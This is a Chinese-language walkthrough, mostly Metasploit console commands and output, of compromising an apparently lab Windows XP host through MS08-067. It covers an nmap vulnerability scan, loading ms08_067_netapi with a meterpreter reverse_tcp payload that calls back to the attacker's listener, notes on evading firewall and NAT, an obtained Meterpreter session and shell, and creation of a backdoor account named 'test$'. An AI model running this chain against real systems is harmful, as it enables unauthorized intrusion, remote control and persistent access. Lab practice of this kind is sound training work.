手工进行漏洞检查的最佳途径之一是在metasploit中使用nmap的扫描脚本
root@bt:/opt/metasploit/msf3# msfconsole
msf > nmap -sT -A --script=smb-check-vulns -PO 172.16.21.170
Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2013-11-19 14:58 CST
Nmap scan report for 172.16.21.170
Host is up (0.00035s latency).
Not shown: 990 closed ports
PORT STATE SERVICE VERSION
25/tcp open smtp Microsoft ESMTP 6.0.2600.1
80/tcp open http Microsoft IIS httpd 5.1
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
443/tcp open https?
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
1025/tcp open msrpc Microsoft Windows RPC
1057/tcp open msrpc Microsoft Windows RPC
1058/tcp open msrpc Microsoft Windows RPC
5000/tcp open upnp Microsoft Windows UPnP
MAC Address: 00:0C:29:9F:1E:49 (VMware)
Device type: general purpose
Running: Microsoft Windows 2000|XP
OS CPE: cpe:/o:microsoft:windows_2000 cpe:/o:microsoft:windows_xp
OS details: Microsoft Windows 2000 SP0 - SP4 or Windows XP SP0 - SP1
Network Distance: 1 hop
Service Info: Host: lixiuli-vcs86vr; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb-check-vulns:
| MS08-067: LIKELY VULNERABLE (host stopped responding)
| Conficker: UNKNOWN; got error SMB: Failed to receive bytes after 5 attempts: TIMEOUT
| regsvc DoS: CHECK DISABLED (add '--script-args=unsafe=1' to run)
| SMBv2 DoS (CVE-2009-3103): CHECK DISABLED (add '--script-args=unsafe=1' to run)
| MS06-025: CHECK DISABLED (remove 'safe=1' argument to run)
|_ MS07-029: CHECK DISABLED (remove 'safe=1' argument to run)
TRACEROUTE
HOP RTT ADDRESS
1 0.35 ms 172.16.21.170
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 151.88 seconds
发现|MS08-067: LIKELY VULNERABLE (host stopped responding)后,去metasploit中找可用于此漏洞的攻击模块
msf > search ms08_067 在metasploit框架中查找ms08_06 netapi攻击模块
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/windows/smb/ms08_067_netapi 2008-10-28 00:00:00 UTC great Microsoft Server Service Relative Path Stack Corruption
msf > use exploit/windows/smb/ms08_067_netapi 用use命令加载这个模块
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp 设置攻击载荷为基于windows系统的meterpreter/reverse_tcp,这个载荷在攻击成功后,会从目录主机发起一个反弹连接,连接到lhost中指定的ip地址,这种反弹连接可以让你绕过防火墙的入站流量保护或者穿透nat网关
payload => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > show targets 大多数msf渗透攻击模块会自动对目标系统类型进行识别,而不需要手工制定此参数,但是ms08-067漏洞的攻击中,通常无法正确的自动识别出系统类型
Exploit targets:
Id Name
-- ----
0 Automatic Targeting
1 Windows 2000 Universal
2 Windows XP SP0/SP1 Universal
3 Windows XP SP2 English (AlwaysOn NX)
4 Windows XP SP2 English (NX)
5 Windows XP SP3 English (AlwaysOn NX)
6 Windows XP SP3 English (NX)
7 Windows 2003 SP0 Universal
8 Windows 2003 SP1 English (NO NX)
9 Windows 2003 SP1 English (NX)
10 Windows 2003 SP1 Japanese (NO NX)
11 Windows 2003 SP2 English (NO NX)
12 Windows 2003 SP2 English (NX)
13 Windows 2003 SP2 German (NO NX)
14 Windows 2003 SP2 German (NX)
15 Windows XP SP2 Arabic (NX)
16 Windows XP SP2 Chinese - Traditional / Taiwan (NX)
17 Windows XP SP2 Chinese - Simplified (NX)
18 Windows XP SP2 Chinese - Traditional (NX)
19 Windows XP SP2 Czech (NX)
20 Windows XP SP2 Danish (NX)
21 Windows XP SP2 German (NX)
22 Windows XP SP2 Greek (NX)
23 Windows XP SP2 Spanish (NX)
24 Windows XP SP2 Finnish (NX)
25 Windows XP SP2 French (NX)
26 Windows XP SP2 Hebrew (NX)
27 Windows XP SP2 Hungarian (NX)
28 Windows XP SP2 Italian (NX)
29 Windows XP SP2 Japanese (NX)
30 Windows XP SP2 Korean (NX)
31 Windows XP SP2 Dutch (NX)
32 Windows XP SP2 Norwegian (NX)
33 Windows XP SP2 Polish (NX)
34 Windows XP SP2 Portuguese - Brazilian (NX)
35 Windows XP SP2 Portuguese (NX)
36 Windows XP SP2 Russian (NX)
37 Windows XP SP2 Swedish (NX)
38 Windows XP SP2 Turkish (NX)
39 Windows XP SP3 Arabic (NX)
40 Windows XP SP3 Chinese - Traditional / Taiwan (NX)
41 Windows XP SP3 Chinese - Simplified (NX)
42 Windows XP SP3 Chinese - Traditional (NX)
43 Windows XP SP3 Czech (NX)
44 Windows XP SP3 Danish (NX)
45 Windows XP SP3 German (NX)
46 Windows XP SP3 Greek (NX)
47 Windows XP SP3 Spanish (NX)
48 Windows XP SP3 Finnish (NX)
49 Windows XP SP3 French (NX)
50 Windows XP SP3 Hebrew (NX)
51 Windows XP SP3 Hungarian (NX)
52 Windows XP SP3 Italian (NX)
53 Windows XP SP3 Japanese (NX)
54 Windows XP SP3 Korean (NX)
55 Windows XP SP3 Dutch (NX)
56 Windows XP SP3 Norwegian (NX)
57 Windows XP SP3 Polish (NX)
58 Windows XP SP3 Portuguese - Brazilian (NX)
59 Windows XP SP3 Portuguese (NX)
60 Windows XP SP3 Russian (NX)
61 Windows XP SP3 Swedish (NX)
62 Windows XP SP3 Turkish (NX)
63 Windows 2003 SP2 Japanese (NO NX)
msf exploit(ms08_067_netapi) > set target 2 指定操作系统类型
target => 2
msf exploit(ms08_067_netapi) > set rhost 172.16.21.170 指定目录地址
rhost => 172.16.21.170
msf exploit(ms08_067_netapi) > set lhost 172.16.21.17 攻击机的ip地址
lhost => 172.16.21.17
msf exploit(ms08_067_netapi) > set lport 8080 攻击机监听的tcp端口
lport => 8080
msf exploit(ms08_067_netapi) > show options 查看参数是否都已经正确设置
Module options (exploit/windows/smb/ms08_067_netapi):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 172.16.21.170 yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique: seh, thread, process, none
LHOST 172.16.21.17 yes The listen address
LPORT 8080 yes The listen port
Exploit target:
Id Name
-- ----
2 Windows XP SP0/SP1 Universal
msf exploit(ms08_067_netapi) > exploit 开始
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on 172.16.21.17:8080
[-] Exploit failed: Rex::Proto::SMB::Exceptions::ErrorCode The server responded with error: STATUS_PIPE_NOT_AVAILABLE (Command=162 WordCount=0)
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on 172.16.21.17:8080
[*] Attempting to trigger the vulnerability...
[*] Sending stage (752128 bytes) to 172.16.21.170
[*] Meterpreter session 1 opened (172.16.21.17:8080 -> 172.16.21.170:1039) at 2013-11-19 15:23:40 +0800
exploit命令初始化攻击环境,并对目标进行攻击尝试,这次攻击时成功的。
meterpreter > pwd
C:WINDOWSsystem32
meterpreter > shell
Process 732 created.
Channel 1 created.
Microsoft Windows XP [ 5.1.2600]
(C) 1985-2001 Microsoft Corp.
C:windows>net user test$ 123456 /add
去被攻击机器170上看一下:
